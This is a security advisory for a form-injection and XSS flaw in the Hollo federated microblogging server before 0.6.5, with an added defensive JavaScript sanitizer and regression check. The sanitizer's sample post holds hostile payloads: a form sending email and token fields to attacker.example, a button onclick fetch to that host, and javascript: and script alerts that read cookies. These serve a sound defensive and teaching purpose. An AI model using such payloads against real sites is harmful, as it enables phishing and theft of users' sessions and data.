Hollo HTML Injection Vulnerability Allowing Cross-Site Scripting

Vulnerability

A vulnerability in Hollo, a federated microblogging server, prior to version 0.6.5 allows HTML form elements contained in federated posts to be rendered and submitted. Hollo did not strip such elements from incoming HTML before rendering it, so a remote post could inject forms for phishing, execute JavaScript, or drive Cross-Site Request Forgery (CSRF) against the viewing user. All Hollo users are affected, because the flaw lies in the rendering of federated posts that include form elements.

Impact

Exploitation of this vulnerability could lead to Cross-Site Scripting (XSS), running attacker-controlled script in the context of the victim's browser session on the Hollo instance. The injected forms could also be used for phishing (for example, a fake signup form that posts its fields to an attacker-controlled site) or for CSRF, tricking users into submitting requests or actions they did not intend.

Reproduction

To reproduce this vulnerability, have a Hollo account receive a federated post that contains HTML form elements such as input fields and a submit button. Hollo renders these elements and allows them to be submitted, whereas most platforms strip them before display. One way to demonstrate this is to federate a post from a WordPress site that embeds a form, such as a newsletter signup form, to a Hollo account.
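As an added example (not Hollo's own code, and not the fix shipped in 0.6.5), the following JavaScript shows the kind of allowlist sanitization a fediverse renderer must apply to remote HTML before displaying it, together with a check a test suite can use to catch regressions of this bug. The constructed sample post mimics a WordPress newsletter signup form as described above; the tag and attribute allowlists, the URL scheme check and the hasFormControls helper are this example's own choices, modelled on the usual Mastodon-style post allowlist.

```javascript
// Added example, not Hollo's own code: a minimal allowlist sanitizer for remote HTML.
// Form controls and script are not in the allowlist, so they are dropped, while
// ordinary post markup (p, a, span, ...) survives. Allowlists are this example's choice.

const ALLOWED_TAGS = new Set([
  "p", "br", "a", "span", "em", "strong", "b", "i", "u", "s", "code", "pre",
  "blockquote", "ul", "ol", "li", "h1", "h2", "h3", "h4", "h5", "h6",
]);
const VOID_TAGS = new Set(["br"]);
// Per-tag attribute allowlist. Anything else (on* handlers, style, formaction, ...) is dropped.
const ALLOWED_ATTRS = {
  a: new Set(["href", "title", "class"]),
  span: new Set(["class"]),
  code: new Set(["class"]),
};
// Elements whose text content must be dropped too, not just their tags.
const DROP_CONTENT_TAGS = new Set([
  "script", "style", "iframe", "object", "embed", "noscript", "template", "select", "textarea",
]);
const SAFE_HREF = /^(https?:|mailto:)/i;

// Escape bare '&', '<' and '>' in text while preserving already well-formed entities.
function escapeText(text) {
  return text
    .replace(/&(?!(?:#\d+|#x[0-9a-f]+|[a-z]+);)/gi, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Rebuild the attribute string of an allowed tag, keeping only allowlisted attributes.
function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return "";
  const attrRe = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = "";
  let hasHref = false;
  let m;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const name = m[1].toLowerCase();
    const value = (m[2] ?? m[3] ?? m[4] ?? "").trim();
    if (!allowed.has(name)) continue;
    if (name === "href") {
      if (!SAFE_HREF.test(value)) continue; // blocks javascript:, data:, vbscript:, ...
      hasHref = true;
    }
    out += ` ${name}="${escapeText(value).replace(/"/g, "&quot;")}"`;
  }
  // Remote links must not hand a window handle or referrer back to the linked site.
  if (tag === "a" && hasHref) out += ' rel="nofollow noopener noreferrer"';
  return out;
}

// Sanitize remote HTML. Returns the safe markup plus the element names that were removed,
// which is worth logging so you can see what a remote instance tried to push.
function sanitizeFederatedHtml(html) {
  const tokenRe = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>|[^<]+|</g;
  const removed = new Set();
  let out = "";
  let skipUntil = null; // name of the drop-content element we are currently inside
  let m;
  while ((m = tokenRe.exec(html)) !== null) {
    const token = m[0];
    if (token.startsWith("<!--")) continue; // comments are never rendered
    if (m[1] === undefined) { // text, or a stray '<' that does not start a tag
      if (skipUntil === null) out += escapeText(token);
      continue;
    }
    const name = m[1].toLowerCase();
    const isClose = token.startsWith("</");
    if (skipUntil !== null) {
      if (isClose && name === skipUntil) skipUntil = null;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) {
      removed.add(name);
      if (!isClose && DROP_CONTENT_TAGS.has(name)) skipUntil = name;
      continue;
    }
    if (isClose) {
      if (!VOID_TAGS.has(name)) out += `</${name}>`;
    } else {
      out += `<${name}${sanitizeAttrs(name, m[2])}>`;
    }
  }
  return { html: out, removed: [...removed].sort() };
}

// Regression check for the issue described above: does markup still carry submittable controls?
function hasFormControls(html) {
  return /<\s*(form|input|button|select|textarea)\b/i.test(html);
}

// Constructed sample (not a real federated post): a WordPress-style post carrying a
// newsletter signup form, an inline event handler, a javascript: link and a script block.
const SAMPLE_POST = `<p>New post: <a href="https://blog.example/hello">Hello, Fediverse!</a></p>
<form action="https://attacker.example/collect" method="post">
  <label>Subscribe to our newsletter</label>
  <input type="email" name="email" placeholder="you@example.org">
  <input type="hidden" name="token" value="abc123">
  <button type="submit" onclick="fetch('https://attacker.example/x')">Sign up</button>
</form>
<p onmouseover="alert(1)">Thanks <a href="javascript:alert(document.cookie)">here</a> &amp; there</p>
<script>alert('xss')</script>`;

const result = sanitizeFederatedHtml(SAMPLE_POST);
console.log(result.html);
console.log("removed:", result.removed.join(", "));
console.log("form controls left:", hasFormControls(result.html));
```

Run with node: the form, its inputs and the button are dropped, the script block disappears with its contents, and the post text and the https link survive. For a production deployment use a maintained sanitizer rather than this regex tokenizer, which does not cover every HTML parsing edge case (for instance a `>` inside a quoted attribute value); the point here is the allowlist shape and the regression check, not the parser.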

Remediation

Update to Hollo version 0.6.5 or later, where this vulnerability has been fixed. The latest version can be downloaded from the Hollo GitHub releases page.

Added: Jul 17, 2025, 2:39 PM
Updated: Jul 17, 2025, 3:45 PM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact          1.3
exploitability  8.7
remediation     7.7
relevance       0.3
threat          6.4
urgency         2.9
incentive       5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.